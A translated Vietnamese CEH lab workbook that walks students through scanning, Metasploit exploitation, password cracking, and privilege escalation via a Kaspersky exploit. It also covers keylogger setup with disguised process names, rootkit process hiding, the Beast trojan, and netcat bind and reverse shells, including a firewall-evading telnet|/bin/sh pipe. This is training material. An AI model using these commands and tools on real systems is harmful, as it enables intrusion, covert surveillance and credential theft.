SinhVienIT.net - CEH Lab Book, Vietnamese, Part 1


  • C|EH Lab Workbook: Material for Students

    VSIC Education Corporation

    Table of Contents

    Lesson 1: FOOTPRINTING
        I/ Introduction to footprinting
        II/ Exercises
            Exercise 1: Finding information about a domain
            Exercise 2: Finding email information

    Lesson 2: SCANNING
        I/ Introduction to scanning
        II/ Exercises
            Exercise 1: Using Nmap
            Exercise 2: Using Retina to detect vulnerabilities and attacking with the Metasploit framework

    Lesson 3: SYSTEM HACKING
        I/ Introduction to system hacking
        II/ Labs
            Lab 1: Cracking passwords on the local machine
            Lab 2: Using pwdump3v2, once one administrator user of the victim machine is known, to find information about the remaining users
            Lab 3: Privilege escalation through Kaspersky Lab
            Lab 4: Using a keylogger
            Lab 5: Using a rootkit and deleting log files

    Lesson 4: TROJANS and BACKDOORS
        I/ Introduction to Trojans and backdoors
        II/ Exercises
            Exercise 1: Using netcat
            Exercise 2: Using the Beast Trojan and detecting Trojans
                To use the Beast Trojan, we need to build a server file and install it on the victim machine; this server file then listens on fixed ports, and from the attacking machine we connect to the victim machine through this port.
            Exercise 3: Using a web-based Trojan

    Lesson 5: SNIFFER METHODS
        I/ Introduction to sniffers

    Lesson 6: Denial-of-Service (DoS) Attacks
        I/ Introduction
        II/ Lab description
            Lab 1: DoS using Ping of Death
            Lab 2: DoS against a protocol that does not use authentication (this lab uses the RIP protocol)
            Lab 3: Using flash for DDoS

    Lesson 7: Social Engineering
        I/ Introduction
        II/ Labs
            Lab 1: Sending an email with a Trojan attached

    Lesson 8: Session Hijacking
        I/ Introduction
        II/ Performing the lab

    Lesson 9: Hacking Web Servers
        I/ Introduction
        II/ Performing the labs
            Lab 1: Attacking a Win 2003 web server (Apache flaw)
            Lab 2: Exploiting a flaw in the Serv-U application

    Lesson 10: WEB APPLICATION HACKING
        I/ Introduction
        II/ Labs
            Lab 1: Cross Site Scripting
            Lab 2: Insufficient Data Validation
            Lab 3: Cookie Manipulation
            Lab 4: Authorization Failure

    Lesson 11: SQL INJECTION
        I/ Introduction to SQL injection
        II/ Lab practice

    Lesson 12: WIRELESS HACKING
        I/ Introduction
        II/ Lab practice

    Lesson 13: VIRUSES
        I/ Introduction (see the additional reading)
        II/ Lab practice
            Exercise 1: A virus that destroys data on the machine
            Exercise 2: The gaixinh virus, which spreads through instant messages

    Lesson 14: BUFFER OVERFLOW
        I/ Theory
        II/ Practice

    Lesson 1: FOOTPRINTING

    I/ Introduction to footprinting:

    Footprinting is a technique that helps a hacker gather information about a business, an individual or an organization. A great deal of information about a target can be uncovered this way. For example, in the first exercise we apply the technique to look up information about a domain (www.itvietnam.com in the example) and see whose contact email is registered for it. In the second exercise we collect a list of email addresses for a given keyword; this method is effective for businesses that want to do marketing by email, and so on.

    In this phase the hacker tries to find as much information as possible about the business (through Internet channels and by phone) and about individuals (through email and their activity on the Internet). If this step is done well, the hacker can determine which of our weak points to attack. For example, to attack the domain www.itvietnam.com, the hacker has to know which email address is the owner of the domain and then find a way to obtain that mailbox's password, by attacking the mail server, by sniffing on the internal network, and so on. Finally, the domain itself is taken over through this owner email.

    II/ Exercises:

    Exercise 1: Finding information about a domain

    We go to www.whois.net and type in the domain we want to look up.

    We then receive the following information:

        Registrar Name....: BlueHost.Com
        Registrar Whois...: whois.bluehost.com
        Registrar Homepage: http://www.bluehost.com/

        Domain Name: ITVIETNAM.COM

        Created on..............: 1999-11-23 11:31:30 GMT
        Expires on..............: 2009-11-23 00:00:00 GMT
        Last modified on........: 2007-07-30 03:15:11 GMT

        Registrant Info: (FAST-12836461)
        VSIC Education Corporation
        VSIC Education Corporation
        78-80 Nguyen Trai Street, 5 District,
        HCM City, 70000
        Vietnam
        Phone: +84.88363691
        Fax..:
        Email: [email protected]
        Last modified: 2007-03-23 04:12:24 GMT

        Administrative Info: (FAST-12836461)
        VSIC Education Corporation
        VSIC Education Corporation
        78-80 Nguyen Trai Street, 5 District,
        HCM City, 70000
        Vietnam
        Phone: +84.88363691
        Fax..:
        Email: [email protected]
        Last modified: 2007-03-23 04:12:24 GMT

        Technical Info: (FAST-12785240)
        Attn: itvietnam.com
        C/O BlueHost.Com Domain Privacy
        1215 North Research Way
        Suite #Q 3500
        Orem, Utah 84097
        United States
        Phone: +1.8017659400
        Fax..: +1.8017651992
        Email: [email protected]
        Last modified: 2007-04-05 16:50:56 GMT

        Status: Locked

    Besides looking up domain information as above, we can use a reverse IP domain lookup utility to see how many hosts share our IP address. The utility is available at the following link:

    http://www.domaintools.com/reverse-ip/

    Finding this information is very valuable to a hacker: knowing which sites share the server, the hacker can go through a vulnerable website in that list, attack the server, and from there control every website hosted on it.

    Exercise 2: Finding email information

    In this exercise we use the program 1st email address spider to search for email addresses. A hacker can use this program to gather more information about mail or to filter out different email targets. You can also use the tool to collect information for marketing purposes, for example when you need the addresses ending in @vnn.vn or @hcm.vnn.vn for product marketing. We can configure which website is used to retrieve the information; in this exercise I use google.com for the search.

    Next, type the keyword vnn.vn into the keyword field.

    The program then gives us a list of email addresses.

    Lesson 2: SCANNING

    I/ Introduction to scanning:

    Scanning, also called network scanning, is an indispensable step when a hacker attacks a network. If this step is done well, the hacker quickly discovers flaws in the system, such as the Windows RPC flaw or flaws in web server software such as Apache. From these flaws the hacker can use malicious code (from websites) to attack the system and, in the worst case, obtain a shell.

    There are many kinds of scanning software, including commercial products such as Retina and GFI and free tools such as Nmap and Nessus. Commercial editions can usually update their list of new bugs from the Internet and can therefore detect newer flaws. Scanning software helps the administrator find the system's flaws and also suggests fixes, such as installing service patches or applying more appropriate policies.

    II/ Exercises

    Exercise 1: Using Nmap

    Before doing this exercise, students should review the theory material on Nmap's options. We can use the copy on the CEH v5 CD or download the latest version from www.insecure.org. Nmap is available for Windows and for Linux; in this exercise we use the Windows version. Students should use VMware and boot several different operating systems, such as Win XP SP2, Win 2003 SP1, Linux Fedora Core, Win 2000 SP4, and so on.

    First we use Nmap to probe which hosts in the subnet are up and which ports they have open. We run nmap -h to review Nmap's options and then run nmap -sS 10.100.100.1-20, which gives the following result:

        C:\Documents and Settings\anhhao>nmap -sS 10.100.100.1-20

        Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:27 Pacific Standard Time
        Interesting ports on 10.100.100.1:
        Not shown: 1695 closed ports
        PORT    STATE SERVICE
        22/tcp  open  ssh
        111/tcp open  rpcbind
        MAC Address: 00:0C:29:09:ED:10 (VMware)

        Interesting ports on 10.100.100.6:
        Not shown: 1678 closed ports
        PORT     STATE SERVICE
        7/tcp    open  echo
        9/tcp    open  discard
        13/tcp   open  daytime
        17/tcp   open  qotd
        19/tcp   open  chargen
        23/tcp   open  telnet
        42/tcp   open  nameserver
        53/tcp   open  domain
        80/tcp   open  http
        135/tcp  open  msrpc
        139/tcp  open  netbios-ssn
        445/tcp  open  microsoft-ds
        1025/tcp open  NFS-or-IIS
        1026/tcp open  LSA-or-nterm
        1027/tcp open  IIS
        1030/tcp open  iad1
        2105/tcp open  eklogin
        3389/tcp open  ms-term-serv
        8080/tcp open  http-proxy
        MAC Address: 00:0C:29:59:97:A2 (VMware)

        Interesting ports on 10.100.100.7:
        Not shown: 1693 closed ports
        PORT     STATE SERVICE
        135/tcp  open  msrpc
        139/tcp  open  netbios-ssn
        445/tcp  open  microsoft-ds
        1025/tcp open  NFS-or-IIS
        MAC Address: 00:0C:29:95:A9:03 (VMware)

        Interesting ports on 10.100.100.11:
        Not shown: 1695 filtered ports
        PORT    STATE SERVICE
        139/tcp open  netbios-ssn
        445/tcp open  microsoft-ds
        MAC Address: 00:0C:29:A6:2E:31 (VMware)

        Skipping SYN Stealth Scan against 10.100.100.13 because Windows does not support scanning your own machine (localhost) this way.
        All 0 scanned ports on 10.100.100.13 are

        Interesting ports on 10.100.100.16:
        Not shown: 1689 closed ports
        PORT     STATE SERVICE
        21/tcp   open  ftp
        25/tcp   open  smtp
        80/tcp   open  http
        135/tcp  open  msrpc
        139/tcp  open  netbios-ssn
        443/tcp  open  https
        445/tcp  open  microsoft-ds
        1433/tcp open  ms-sql-s
        MAC Address: 00:0C:29:D6:73:6D (VMware)

        Interesting ports on 10.100.100.20:
        Not shown: 1693 closed ports
        PORT     STATE SERVICE
        135/tcp  open  msrpc
        445/tcp  open  microsoft-ds
        1000/tcp open  cadlock
        5101/tcp open  admdog
        MAC Address: 00:15:C5:65:E3:85 (Dell)

        Nmap finished: 20 IP addresses (7 hosts up) scanned in 21.515 seconds

    There are 7 hosts on the network in total: 6 VMware machines and 1 Dell PC. In the next step we look for information about the operating systems of these hosts, using the command nmap -v -O followed by the IP address (the run below shows the details of the Nmap scan).

        C:\Documents and Settings\anhhao>nmap -vv -O 10.100.100.7

        Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:46 Pacific Standard Time
        Initiating ARP Ping Scan at 10:46
        Scanning 10.100.100.7 [1 port]
        Completed ARP Ping Scan at 10:46, 0.22s elapsed (1 total hosts)
        Initiating Parallel DNS resolution of 1 host. at 10:46
        Completed Parallel DNS resolution of 1 host. at 10:46, 0.01s elapsed
        Initiating SYN Stealth Scan at 10:46
        Scanning 10.100.100.7 [1697 ports]
        Discovered open port 1025/tcp on 10.100.100.7
        Discovered open port 445/tcp on 10.100.100.7
        Discovered open port 135/tcp on 10.100.100.7
        Discovered open port 139/tcp on 10.100.100.7
        Completed SYN Stealth Scan at 10:46, 1.56s elapsed (1697 total ports)
        Initiating OS detection (try #1) against 10.100.100.7
        Host 10.100.100.7 appears to be up ... good.
        Interesting ports on 10.100.100.7:
        Not shown: 1693 closed ports
        PORT     STATE SERVICE
        135/tcp  open  msrpc
        139/tcp  open  netbios-ssn
        445/tcp  open  microsoft-ds
        1025/tcp open  NFS-or-IIS
        MAC Address: 00:0C:29:95:A9:03 (VMware)
        Device type: general purpose
        Running: Microsoft Windows 2003
        OS details: Microsoft Windows 2003 Server SP1
        Network Distance: 1 hop
        TCP Sequence Prediction: Difficulty=255 (Good luck!)
        IPID Sequence Generation: Incremental

        OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
        Nmap finished: 1 IP address (1 host up) scanned in 3.204 seconds
                       Raw packets sent: 1767 (78.460KB) | Rcvd: 1714 (79.328KB)

    The fingerprints can be viewed at C:\Program Files\Nmap\nmap-os-fingerprints

    We continue with the remaining machines.

        C:\Documents and Settings\anhhao>nmap -O 10.100.100.1

        Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:54 Pacific Standard Time
        Interesting ports on 10.100.100.1:
        Not shown: 1695 closed ports
        PORT    STATE SERVICE
        22/tcp  open  ssh
        111/tcp open  rpcbind
        MAC Address: 00:0C:29:09:ED:10 (VMware)
        Device type: general purpose
        Running: Linux 2.6.X
        OS details: Linux 2.6.9 - 2.6.12 (x86)
        Uptime: 0.056 days (since Thu Aug 02 09:34:08 2007)
        Network Distance: 1 hop

        OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
        Nmap finished: 1 IP address (1 host up) scanned in 2.781 seconds

    However, there are some hosts that Nmap cannot identify, as in the following case:

        C:\Documents and Settings\anhhao>nmap -O 10.100.100.16

        Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:55 Pacific Standard Time
        Interesting ports on 10.100.100.16:
        Not shown: 1689 closed ports
        PORT     STATE SERVICE
        21/tcp   open  ftp
        25/tcp   open  smtp
        80/tcp   open  http
        135/tcp  open  msrpc
        139/tcp  open  netbios-ssn
        443/tcp  open  https
        445/tcp  open  microsoft-ds
        1433/tcp open  ms-sql-s
        MAC Address: 00:0C:29:D6:73:6D (VMware)
        No exact OS matches for host (If you know what OS is running on it, see http://insecure.org/nmap/submit/ ).
        Network Distance: 1 hop

        OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
        Nmap finished: 1 IP address (1 host up) scanned in 12.485 seconds

    We can nevertheless tell that this is a server running SQL and web server services. We now use the command nmap -v -p 80 -sV 10.100.100.16 to determine the IIS version.

        C:\Documents and Settings\anhhao>nmap -p 80 -sV 10.100.100.16

        Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 11:01 Pacific Standard Time
        Interesting ports on 10.100.100.16:
        PORT   STATE SERVICE VERSION
        80/tcp open  http    Microsoft IIS webserver 5.0
        MAC Address: 00:0C:29:D6:73:6D (VMware)
        Service Info: OS: Windows

        Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
        Nmap finished: 1 IP address (1 host up) scanned in 6.750 seconds

    So we can guess that the host is most likely Windows 2000 Server. Beyond the practice above, we can also use Nmap to trace, to save logs, and so on.

    Exercise 2: Using Retina to detect vulnerabilities and attacking with the Metasploit framework

    Retina from eEye is commercial software (like GFI, shadow and others) that regularly updates its list of vulnerabilities and helps the system administrator come up with remediation. We now use Retina to look for flaws on the Win 2003 SP0 machine (10.100.100.6).

    Report from the Retina program:

    TOP 20 VULNERABILITIES
    The following is an overview of the top 20 vulnerabilities on your network.

        Rank  Vulnerability Name                                  Count
        1.    echo service                                        1
        2.    ASN.1 Vulnerability Could Allow Code Execution      1
        3.    Windows Cumulative Patch 835732 Remote              1
        4.    Null Session                                        1
        5.    No Remote Registry Access Available                 1
        6.    telnet service                                      1
        7.    DCOM Enabled                                        1
        8.    Windows RPC Cumulative Patch 828741 Remote          1
        9.    Windows RPC DCOM interface buffer overflow          1
        10.   Windows RPC DCOM multiple vulnerabilities           1
        11.   Apache 1.3.27 0x1A Character Logging DoS            1
        12.   Apache 1.3.27 HTDigest Command Execution            1
        13.   Apache mod_alias and mod_rewrite Buffer Overflow    1
        14.   ApacheBench multiple buffer overflows               1
        15.   HTTP TRACE method supported                         1

    TOP 20 OPEN PORTS
    The following is an overview of the top 20 open ports on your network.

        Rank  Port Number  Description                                                          Count
        1.    TCP:7        ECHO - Echo                                                          1
        2.    TCP:9        DISCARD - Discard                                                    1
        3.    TCP:13       DAYTIME - Daytime                                                    1
        4.    TCP:17       QOTD - Quote of the Day                                              1
        5.    TCP:19       CHARGEN - Character Generator                                        1
        6.    TCP:23       TELNET - Telnet                                                      1
        7.    TCP:42       NAMESERVER / WINS - Host Name Server                                 1
        8.    TCP:53       DOMAIN - Domain Name Server                                          1
        9.    TCP:80       WWW-HTTP - World Wide Web HTTP (Hyper Text Transfer Protocol)        1
        10.   TCP:135      RPC-LOCATOR - RPC (Remote Procedure Call) Location Service           1
        11.   TCP:139      NETBIOS-SSN - NETBIOS Session Service                                1
        12.   TCP:445      MICROSOFT-DS - Microsoft-DS                                          1
        13.   TCP:1025     LISTEN - listen                                                      1
        14.   TCP:1026     NTERM - nterm                                                        1
        15.   TCP:1030     IAD1 - BBN IAD                                                       1
        16.   TCP:2103     ZEPHYR-CLT - Zephyr Serv-HM Conncetion                               1
        17.   TCP:2105     EKLOGIN - Kerberos (v4) Encrypted RLogin                             1
        18.   TCP:3389     MS RDP (Remote Desktop Protocol) / Terminal Services                 1
        19.   TCP:8080     Generic - Shared service port                                        1
        20.   UDP:7        ECHO - Echo                                                          1

    TOP 20 OPERATING SYSTEMS
    The following is an overview of the top 20 operating systems on your network.

        Rank  Operating System Name  Count
        1.    Windows Server 2003    1

    We have thus determined the operating system of machine 10.100.100.6, the open ports of the system and the system's flaws. This is the information the administrator needs to identify the flaws and patch them. From the top 20 vulnerabilities we will exploit bug number 10, RPC DCOM, using the Metasploit framework (CEH v5 CD). Details of this flaw can be checked on eEye's own site or on securityfocus.com and microsoft.com. We use Metasploit's console interface to find the bug that matches what Retina has just reported.

    We can see that the bug msrpc_dcom_ms03_026.pm is listed among Metasploit's exploits. We now begin exploiting this flaw.

    After the exploitation we have a shell on the Win 2003 machine, and we can now upload a backdoor or take whatever information we need from this machine (this is discussed in later chapters).

    Conclusion: scanning software is very important to a hacker for discovering a system's flaws; once a flaw is identified, the hacker can use a ready-made framework or code available on the Internet to take control of the target machine. It is, however, also a useful tool for the system administrator: this software helps the administrator reassess the security level of the system and continuously check for the bugs that arise.
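The administrator-side use of scan results described in the conclusion, as an added example that is not part of the original workbook: a Python parser for Nmap 4.20-style normal output (the layout of the listings in Exercise 1) that builds a per-host inventory, flags legacy services, and reports open ports missing from an approved baseline. The sample scan text is constructed, and the function names, the `RISKY_SERVICES` policy and the baseline are assumptions of this example.

```python
import re

# Constructed sample (documentation addresses) in the layout Nmap 4.20 prints.
SAMPLE_SCAN = """\
Starting Nmap 4.20 ( http://insecure.org ) at 2007-08-02 10:27 Pacific Standard Time
Interesting ports on 192.0.2.10:
Not shown: 1695 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
MAC Address: 00:0C:29:00:00:01 (VMware)

Interesting ports on 192.0.2.20:
Not shown: 1690 closed ports
PORT     STATE    SERVICE
7/tcp    open     echo
19/tcp   open     chargen
23/tcp   open     telnet
80/tcp   open     http
135/tcp  open     msrpc
445/tcp  open     microsoft-ds
3389/tcp filtered ms-term-serv
MAC Address: 00:0C:29:00:00:02 (VMware)

Nmap finished: 20 IP addresses (2 hosts up) scanned in 21.515 seconds
"""

# Assumed hardening policy for this example. "echo" and "telnet" mirror entries
# in the Retina report; the others are the remaining simple TCP/IP services
# that were open on the same lab host.
RISKY_SERVICES = {
    "echo": "simple TCP/IP service, disable",
    "discard": "simple TCP/IP service, disable",
    "daytime": "simple TCP/IP service, disable",
    "qotd": "simple TCP/IP service, disable",
    "chargen": "simple TCP/IP service, disable",
    "telnet": "cleartext remote login, replace with SSH or disable",
}

# Host header, with or without a resolved hostname in front of the address.
HOST_RE = re.compile(r"^Interesting ports on (?:\S+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?:")
# Port table row: "23/tcp open telnet" (a VERSION column from -sV is ignored).
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-F:]{17})(?: \((.*)\))?")


def parse_scan(text):
    """Return {ip: {"mac": ..., "vendor": ..., "ports": [row, ...]}}."""
    inventory = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            current = inventory.setdefault(
                m.group(1), {"mac": None, "vendor": None, "ports": []})
            continue
        if current is None:
            continue  # banner lines before the first host block
        m = PORT_RE.match(line)
        if m:
            current["ports"].append({"port": int(m.group(1)), "proto": m.group(2),
                                     "state": m.group(3), "service": m.group(4)})
            continue
        m = MAC_RE.match(line)
        if m:
            current["mac"], current["vendor"] = m.group(1), m.group(2)
    return inventory


def audit(inventory, policy=RISKY_SERVICES):
    """List (ip, port, service, advice) for open ports whose service is in the policy."""
    findings = []
    for ip, host in inventory.items():
        for row in host["ports"]:
            if row["state"] == "open" and row["service"] in policy:
                findings.append((ip, row["port"], row["service"], policy[row["service"]]))
    return findings


def unexpected_ports(inventory, baseline):
    """Open ports that are not in the approved baseline {ip: {port, ...}}."""
    extra = {}
    for ip, host in inventory.items():
        allowed = baseline.get(ip, set())
        new = sorted(r["port"] for r in host["ports"]
                     if r["state"] == "open" and r["port"] not in allowed)
        if new:
            extra[ip] = new
    return extra


if __name__ == "__main__":
    inv = parse_scan(SAMPLE_SCAN)
    for finding in audit(inv):
        print("%s port %d (%s): %s" % finding)
    # Constructed baseline: what the administrator has approved per host.
    approved = {"192.0.2.10": {22, 111}, "192.0.2.20": {80, 135, 445}}
    print("not in baseline:", unexpected_ports(inv, approved))
```

Saving each scan's text and running the baseline comparison on it turns the conclusion's "continuous checking" into a repeatable diff.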

    Lesson 3: SYSTEM HACKING

    I/ Introduction to system hacking:

    As we learned in the theory part, the System Hacking module covers techniques for obtaining usernames and passwords, escalating privileges in the system, using a keylogger to capture the other party's information (at this step the hacker may also leave a Trojan behind, which is covered in the next chapter), hiding information about running processes (rootkit), and deleting system logs.

    To obtain local usernames and passwords, the hacker can crack passwords on the local machine with software installed on that machine, or boot from a Knoppix CD to obtain the syskey; the next step is to decrypt the SAM to get the hashes of the system accounts. Usernames and passwords can also be obtained remotely, through SMB or NTLM (using the sniffing techniques covered in a later chapter), or through one already known account on the system (using PWdump3).

    For privilege escalation, the hacker can use a vulnerability in Windows or in software running on the system to gain admin rights and control the system. In the lab we exploit a vulnerability in Kaspersky Lab 6.0 to escalate from a normal user to an Administrator user on Win XP SP2.

    In the keylogger part we use SC-Keylogger to watch the victim's activity: monitoring keyboard input, chat information, information about how the machine is used, and information about the user accounts in use.

    Next we use a rootkit to hide the keylogger's processes, so that the system administrator cannot detect that the machine is being monitored. At this step we use the Vanquish rootkit to hide processes in the system. Finally, we delete the logs and the traces of the intrusion.

    II/ Labs

    Lab 1: Cracking passwords on the local machine

    First we install Cain on the other party's machine and use it to find the users' passwords.

    The Add user process

    Start Cain and choose Import Hashes from local system.

    Here we see three modes. With Import Hashes from local system, we use the SAM file of the current system to obtain the account hashes (without syskey encryption). With the option Import Hashes from text file, the text file usually comes from Pwdump (which stores the system's account hashes in unencrypted form). The third option is for when we have the syskey and a SAM file encrypted with that syskey. In all three cases, if the information is entered in full, we obtain account hashes that are not encrypted by the syskey. Based on these hashes the software brute-forces the account passwords. In this lab we choose the user haovsic and choose brute force against the NTLM hash. After choosing this mode, the PC starts computing and produces the result.

    Lab 2: Using pwdump3v2, once one administrator user of the victim machine is known, to find information about the remaining users.

    The victim machine runs Windows 2003 SP0 and has the user quyen with the password cisco. Based on this account, we can find information about the other accounts on the machine. First we run pwdump3.exe to see which parameters it needs. We then run the command pwdump3.exe 10.100.100.6 c:\hao2003sp0 quyen and enter the password of user quyen.

    We open the file hao2003sp0 to view the information in it.

    We see that user quyen has ID 500, which is the ID of the administrator user on the network, and that user Guest has ID 501. Besides this information, we also have the password hashes of the users. We now use Cain to find the passwords of the other users.

    Using a Brute Force Attack against the user hiclassceh, we find that the password is 1234a. This password has only 5 characters and is easily brute-forced; for a strong password (one that includes uppercase and lowercase letters, digits and special characters) it would take longer.

    Lab 3: Privilege escalation through Kaspersky Lab

    To escalate privileges on a system, a hacker must take advantage of some vulnerability, either in the operating system or in third-party software. In this case, we escalate privileges through the antivirus software Kaspersky Lab. To prepare for this lab, we go to the website www.milw0rm.com to find information about this exploit code.

    We then compile this code into an exe file to attack the victim machine. To carry out the lab, Kaspersky must be installed on the machine. After installing it, we add a normal user to the machine and log on as that user. In this lab we use the user hao with the password hao.


    Run the compiled exe file to exploit Kaspersky, which is running with system admin privileges.

    Use the command telnet 127.0.0.1 8080 to access the shell, which has system admin privileges. We then use the command Net Localgroup administrators hao /add to add the user hao to the admin group, and the command net user to confirm:

        Microsoft Windows XP [Version 5.1.2600]
        (C) Copyright 1985-2001 Microsoft Corp.

        D:\WINDOWS\system32>
        D:\WINDOWS\system32>net Localgroup administrators hao /add
        net Localgroup administrators hao /add
        The command completed successfully.

        D:\WINDOWS\system32>net user hao
        net user hao
        User name                    hao
        Full Name
        Comment
        User's comment
        Country code                 000 (System Default)
        Account active               Yes
        Account expires              Never

        Password last set            8/3/2007 1:47 PM
        Password expires             9/15/2007 12:35 PM
        Password changeable          8/3/2007 1:47 PM
        Password required            Yes
        User may change password     Yes

        Workstations allowed         All
        Logon script
        User profile
        Home directory
        Last logon                   8/3/2007 1:54 PM

        Logon hours allowed          All

        Local Group Memberships      *Administrators       *Users
        Global Group memberships     *None
        The command completed successfully.

        D:\WINDOWS\system32>

    We see that the user hao now has Admin rights on the system, so the privilege escalation succeeded. You can test similar software using code downloaded from www.milw0rm.com.

    Lab 4: Using a keylogger

    In this lab, we use the SC Keylogger software to collect information from the victim's machine. The work involved is to create the keylog file, choose a mail relay server, and install it on the victim. After installing the software that builds the keylogger file, we start configuring our keylogger. First we choose which actions are written to the log file: keyboard, mouse, and the programs that are run.


    Next we choose the email address to which the victim machine will send the log file. The log is sent once every 10 minutes.

    Next we configure the mail relay server and the process name that will be displayed. Here hackers usually use names that resemble services already present on Windows, such as svchost.exe, csrss.exe and so on, to deceive the admin. For easy identification we choose the file name cehkeylogger.

    After the keylogger has been created, we run it on the victim machine. We pick some Win XP machine to run this program on and suppose that text like the following is typed:


    After waiting about 10 minutes we see the log file arrive, as follows:

        >> C:\WINDOWS\system32\notepad.exe
        > Chuc lop SecCEH manh khoe, va nhieu thanh dat..
        > Chuc lop CEH hoc gioi
        >::::::::::
        > ms
        > C:\WINDOWS\system32\mspaint.exe

    As shown above, the keylogger can record almost all the information on the victim's PC, in particular sensitive information such as credit cards, accounts and so on. The author advises you to use this knowledge for research purposes and not to use this program for malicious purposes.

    Lab 5: Using a rootkit and deleting log files

    A rootkit is a program that hides the activity of a keylogger or trojan, making it hard for the system admin to detect. In this exercise we use Fu Rootkit to hide the process of the keylogger installed in the previous lab. We use the tasklist command to view the processes running on the computer.


    As the figure shows, the process cehkeyloger.exe has PID 1236. We now hide this process with the command fu -ph 1236 and check the process list again with tasklist.


    The keylogger has disappeared from tasklist. To detect it accurately at this point, the admin should use antivirus software, control access, and run rootkit-checking programs on the machine such as rootkit detector.


    Lesson 4: TROJAN and BACKDOOR

    I/ Introduction to Trojans and Backdoors:

    Trojans and backdoors are used to monitor the victim machine, and serve as a back door through which a hacker can re-enter the computer system, either through a network port or through the web (web-based). Port-based ones we commonly see are netcat, beast, Donald Dick and so on. Web-based ones are typically r57, c99, zehir4 and so on. A characteristic of a port-based trojan is that every connection requires an open port, so an admin can detect it relatively more easily than the web-based kind (which usually targets web servers). In the exercises, we try out the features of netcat, beast, c99 and zehir4, and analyze a sample piece of trojan code.

    II/ Exercises:

    Exercise 1: Using netcat

    1/ Using netcat to connect a shell

    On the victim's computer, start netcat in listening mode: use the option -l (listen) and -p port to set the port number to listen on, and -e to make netcat execute a program when a connection arrives, usually the command shell cmd.exe (on NT) or bin/sh (on Unix).

        E:\>nc -nvv -l -p 8080 -e cmd.exe
        listening on [any] 8080 ...
        connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
        sent 0, rcvd 0: unknown socket error

    - on the attacking computer, simply use netcat to connect to the victim machine on the chosen port, for example 8080

        C:\>nc -nvv 172.16.84.2 8080
        (UNKNOWN) [172.16.84.2] 8080 (?) open
        Microsoft Windows 2000 [Version 5.00.2195]
        Copyright 1985-1999 Microsoft Corp.
        E:\>cd test
        cd test
        E:\test>dir /w
        dir /w
        Volume in drive E has no label.
        Volume Serial Number is B465-452F
        Directory of E:\test
        [.] [..] head.log NETUSERS.EXE NetView.exe
        ntcrash.zip password.txt pwdump.exe
        6 File(s) 262,499 bytes
        2 Dir(s) 191,488,000 bytes free
        C:\test>exit
        exit
        sent 20, rcvd 450: NOTSOCK

    We now have a shell and control of the victim machine. However, after this connection, netcat on the victim machine also closes. To make netcat listen again after each connection, use -L instead of -l. Note: -L applies only to Netcat for Windows, not to the version that runs on Linux.

    2/ Using netcat to connect a reverse shell to bypass the firewall:

    - use telnet to connect to the listening netcat windows, then feed commands from one window into the reverse telnet stream and send the results to the other window.

    Example:

    - on the attacking machine (172.16.84.1), open 2 netcat windows listening on ports 80 and 25 respectively:

    + Netcat window (1)

        C:\>nc -nvv -l -p 80
        listening on [any] 80 ...
        connect to [172.16.84.1] from [172.16.84.2] 1055
        pwd
        ls -la
        _

    + Netcat window (2)

        C:\>nc -nvv -l -p 25
        listening on [any] 25 ...
        connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056
        /
        total 171
        drwxr-xr-x  17 root root   4096 Feb  5 16:15 .
        drwxr-xr-x  17 root root   4096 Feb  5 16:15 ..
        drwxr-xr-x   2 root root   4096 Feb  5 08:55 bin
        drwxr-xr-x   3 root root   4096 Feb  5 14:19 boot
        drwxr-xr-x  13 root root 106496 Feb  5 14:18 dev
        drwxr-xr-x  37 root root   4096 Feb  5 14:23 etc
        drwxr-xr-x   6 root root   4096 Feb  5 08:58 home
        drwxr-xr-x   6 root root   4096 Feb  5 08:50 lib
        drwxr-xr-x   2 root root   7168 Dec 31  1969 mnt
        drwxr-xr-x   4 root root   4096 Feb  5 16:18 nc
        drwxr-xr-x   2 root root   4096 Aug 23 12:03 opt
        dr-xr-xr-x  61 root root      0 Feb  5 09:18 proc
        drwx------  12 root root   4096 Feb  5 16:24 root
        drwxr-xr-x   2 root root   4096 Feb  5 08:55 sbin
        drwxrwxrwt   9 root root   4096 Feb  5 16:25 tmp
        drwxr-xr-x  13 root root   4096 Feb  5 08:42 usr
        drwxr-xr-x  18 root root   4096 Feb  5 08:52 var

    - on the victim computer (172.16.84.2), run a reverse telnet to the attacking machine (172.16.84.1), using /bin/sh to produce the output:

        [root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25
        /bin/sh: Trying: command not found
        /bin/sh: Connected: command not found
        /bin/sh: Escape: command not found
        Trying 172.16.84.1...
        Connected to 172.16.84.1.
        Escape character is '^]'.
        _

    Telnet on the victim machine passes everything we type in Netcat window (1), port 80, to /bin/sh for execution. The output of /bin/sh is sent back to the attacking computer in Netcat window (2), port 25. All you have to do is type commands in Netcat window (1) and read the results in Netcat window (2). I chose ports 80 and 25 because these ports are usually not blocked by firewalls or filters.

    Exercise 2: Using the Beast trojan and detecting trojans

    To use the Beast trojan, we need to build a Server file and install it on the victim machine. This server file then listens on fixed ports, and from the attacking machine we connect to the victim machine through this port. Select the Beast trojan on the CD and run the file that builds the trojan.

    We can also use features such as AV-FW kill to turn off the firewall on the other machine, or inject into another file such as notepad.exe or explore in the form of a dll. We use the Save Server button to create the file server.exe, run the file on the victim machine, and check in the victim machine's Task Manager that the trojan is actually running.


    Now we use the program on the attacking machine to connect to the Server file running on the victim's machine.

    We try out some features, such as the file manager to download the files we need from the victim machine, or shutting down and rebooting the victim machine through the features on the Windows tab.


    Countermeasures: Besides using anti-virus and anti-trojan programs, we can rely on the usual property that these trojans must open some port to the outside. We can see such ports with the Curr Port program or the fport program.
